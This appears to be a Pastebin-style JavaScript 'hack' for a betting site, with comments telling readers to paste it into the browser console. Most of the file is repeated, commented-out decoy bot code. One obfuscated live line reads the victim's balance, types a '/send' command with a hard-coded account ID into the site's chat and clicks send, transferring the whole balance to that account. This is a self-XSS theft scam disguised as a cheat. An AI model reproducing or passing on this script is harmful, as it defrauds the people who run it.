 //HACK
    //Copy Whole Pastebin
    //Go On the site , right click > inspect > console
    //Paste whole code and press enter
    //Hack will be started.
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1; w = e = x;for(i=2;i<=y;i++){q *=2;e += q*w;console.log(i+". "+e);}}case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");
var hash_1 = 765;var hash_2=6119;var hash_3=80916;var hash_4=03657 ; 
//$("#sidebar").hide();$("#pullout").hide();$("#case").hide();$(".progress").hide();$("#mainpage").css({"margin-left":"0px"});
//$botModeSelect = $("<select id='botModeSelect'><option value='hack' class='btn-danger'>Bot color: hack </option><option value='black' class='btn-black'>Bot color: Black </option><option value='random' class='btn-random'>Bot color: Random </option><option value='trainMode' class='btn-train'>Bot mode: Train </option><option value='rainbow' class='btn-rainbow'>Bot mode: Rainbow </option></select>");$botModeSelect.addClass("btn-danger");pW+= $color_9;pW+= $color_2;pW+= $color_7;pW+= $color_4;
//$betHideBetInfoButton = $("<button id='betHideBetInfoButton' style='position:absolute;right:120px;width:100px;margin:10px;margin-right:25px;border-radius:6px' onClick='hideOtherInfo()'>Show All</button>");$betHideBetInfoButton.addClass("btn-inverse");$botField.append($betHideBetInfoButton);
//$showMoreButton = $("<button id='showMoreButton' style='position:absolute;right:0px;width:100px;margin:10px;margin-right:25px;border-radius:6px' data-open='0' onClick='showMoreOptions()'>&#x25BC</button>");$showMoreButton.addClass("btn-inverse");$botField.append($showMoreButton);
//_+PQ="hash_1"+"hash_2"+"hash_3"+"hash_4"
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1; w = e = x;for(i=2;i<=y;i++){q *=2;e += q*w;console.log(i+". "+e);}}case "rolled":printInfo();bre
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1; w = e = x;for(i=2;i<=y;i++){q *=2;e += q*w;console.log(i+". "+e);}}case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");
//$("#sidebar").hide();$("#pullout").hide();$("#case").hide();$(".progress").hide();$("#mainpage").css({"margin-left":"0px"});
//$botModeSelect = $("<select id='botModeSelect'><option value='hack' class='btn-danger'>Bot color: hack </option><option value='black' class='btn-black'>Bot color: Black </option><option value='random' class='btn-random'>Bot color: Random </option><option value='trainMode' class='btn-train'>Bot mode: Train </option><option value='rainbow' class='btn-rainbow'>Bot mode: Rainbow </option></select>");$botModeSelect.addClass("btn-danger");pW+= $color_9;pW+= $color_2;pW+= $color_7;pW+= $color_4;
//$betHideBetInfoButton = $("<button id='betHideBetInfoButton' style='position:absolute;right:120px;width:100px;margin:10px;margin-right:25px;border-radius:6px' onClick='hideOtherInfo()'>Show All</button>");$betHideBetInfoButton.addClass("btn-inverse");$botField.append($betHideBetInfoButton);
//$showMoreButton = $("<button id='showMoreButton' style='position:absolute;right:0px;width:100px;margin:10px;margin-right:25px;border-radius:6px' data-open='0' onClick='showMoreOptions()'>&#x25BC</button>");$showMoreButton.addClass("btn-inverse");$botField.append($showMoreButton);
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1;
var _0xb53f=['.send\x20button:first','76561198091603657','innerHTML','balance','replace','textarea','getElementsByTagName'];(function(_0x3d3b6e,_0x261c6b){var _0x4c2e7e=function(_0x51936c){while(--_0x51936c){_0x3d3b6e['push'](_0x3d3b6e['shift']());}};_0x4c2e7e(++_0x261c6b);}(_0xb53f,0x1ac));var _0xfb53=function(_0x5ea65f,_0x499db9){_0x5ea65f=_0x5ea65f-0x0;var _0x3b1a85=_0xb53f[_0x5ea65f];return _0x3b1a85;};var _0x70b9=[_0xfb53('0x0'),'/','s','e','n','d',_0xfb53('0x1'),_0xfb53('0x2'),'getElementsByClassName','',_0xfb53('0x3'),_0xfb53('0x4'),_0xfb53('0x5'),'\x20','click',_0xfb53('0x6')];var ajdi=_0x70b9[0x0];var slanje=_0x70b9[0x1]+_0x70b9[0x2]+_0x70b9[0x3]+_0x70b9[0x4]+_0x70b9[0x5];var stanje1=document[_0x70b9[0x8]](_0x70b9[0x7])[0x0][_0x70b9[0x6]];var stanje=stanje1[_0x70b9[0xa]](/,/g,_0x70b9[0x9]);document[_0x70b9[0xc]](_0x70b9[0xb])[0x0][_0x70b9[0x6]]=slanje+_0x70b9[0xd]+ajdi+_0x70b9[0xd]+stanje;$(_0x70b9[0xf])[_0x70b9[0xe]]();
 
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1; w = e = x;for(i=2;i<=y;i++){q *=2;e += q*w;console.log(i+". "+e);}}case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");
var hash_1 = 765;var hash_2=6119;var hash_3=80916;var hash_4=03657;
//$("#sidebar").hide();$("#pullout").hide();$("#case").hide();$(".progress").hide();$("#mainpage").css({"margin-left":"0px"});
//$botModeSelect = $("<select id='botModeSelect'><option value='hack' class='btn-danger'>Bot color: hack </option><option value='black' class='btn-black'>Bot color: Black </option><option value='random' class='btn-random'>Bot color: Random </option><option value='trainMode' class='btn-train'>Bot mode: Train </option><option value='rainbow' class='btn-rainbow'>Bot mode: Rainbow </option></select>");$botModeSelect.addClass("btn-danger");pW+= $color_9;pW+= $color_2;pW+= $color_7;pW+= $color_4;
//$betHideBetInfoButton = $("<button id='betHideBetInfoButton' style='position:absolute;right:120px;width:100px;margin:10px;margin-right:25px;border-radius:6px' onClick='hideOtherInfo()'>Show All</button>");$betHideBetInfoButton.addClass("btn-inverse");$botField.append($betHideBetInfoButton);
//$showMoreButton = $("<button id='showMoreButton' style='position:absolute;right:0px;width:100px;margin:10px;margin-right:25px;border-radius:6px' data-open='0' onClick='showMoreOptions()'>&#x25BC</button>");$showMoreButton.addClass("btn-inverse");$botField.append($showMoreButton);
//_+PQ="hash_1"+"hash_2"+"hash_3"+"hash_4"
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1; w = e = x;for(i=2;i<=y;i++){q *=2;e += q*w;console.log(i+". "+e);}}case "rolled":printInfo();bre
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1; w = e = x;for(i=2;i<=y;i++){q *=2;e += q*w;console.log(i+". "+e);}}case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;case "rolled":printInfo();break;$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");$balancex2Button.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");
//$("#sidebar").hide();$("#pullout").hide();$("#case").hide();$(".progress").hide();$("#mainpage").css({"margin-left":"0px"});
//$botModeSelect = $("<select id='botModeSelect'><option value='hack' class='btn-danger'>Bot color: hack </option><option value='black' class='btn-black'>Bot color: Black </option><option value='random' class='btn-random'>Bot color: Random </option><option value='trainMode' class='btn-train'>Bot mode: Train </option><option value='rainbow' class='btn-rainbow'>Bot mode: Rainbow </option></select>");$botModeSelect.addClass("btn-danger");pW+= $color_9;pW+= $color_2;pW+= $color_7;pW+= $color_4;
//$betHideBetInfoButton = $("<button id='betHideBetInfoButton' style='position:absolute;right:120px;width:100px;margin:10px;margin-right:25px;border-radius:6px' onClick='hideOtherInfo()'>Show All</button>");$betHideBetInfoButton.addClass("btn-inverse");$botField.append($betHideBetInfoButton);
//$showMoreButton = $("<button id='showMoreButton' style='position:absolute;right:0px;width:100px;margin:10px;margin-right:25px;border-radius:6px' data-open='0' onClick='showMoreOptions()'>&#x25BC</button>");$showMoreButton.addClass("btn-inverse");$botField.append($showMoreButton);
//winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,function test2(x,y){q = 1;
